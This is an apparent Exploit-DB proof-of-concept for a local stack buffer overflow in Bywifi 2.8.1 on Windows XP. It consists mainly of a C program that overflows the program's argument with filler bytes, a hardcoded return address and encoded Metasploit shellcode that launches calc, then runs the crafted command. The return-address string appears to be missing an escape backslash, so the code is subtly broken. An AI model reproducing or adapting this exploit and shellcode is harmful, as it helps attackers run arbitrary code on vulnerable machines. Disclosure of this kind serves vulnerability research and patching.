Bywifi 2.8.1 - Local Stack Buffer Overflow

EDB-ID:

15888

CVE:

N/A


Author:

anonymous

Type:

local


Platform:

Windows

Date:

2011-01-01


/*
# Exploit Title: [bywifi 2.8.1 stack  buffer overflow]
# Author: [Anonymous]
# Software Link: [bywifi.com]
# Version: [2.8.1]
# Tested on: [windows xp Professional French  ]
# CVE : [N/a]
*/

#include <windows.h>
#include <string.h>
#include <stdio.h>
int main()
{
//file name
char exploit[700]="bywifi.exe "; 
//ret addr
char ret[] = "x5D\x38\x82\x7C";
//junk data
char overflow[260];
for(int i=0;i<260;i++){
overflow[i]=0x41;
}
/*
* windows/exec - 144 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
char shellcode[] =
"\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"
"\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"
"\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"
"\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"
"\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"
"\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"
"\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"
"\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"
"\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"
"\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
printf("Exploiting ......\n");
strcat(exploit, overflow);
strcat(exploit, ret);
strcat(exploit, shellcode);
WinExec(exploit,0);
printf("Exploitation Finished\n");
return 0;
}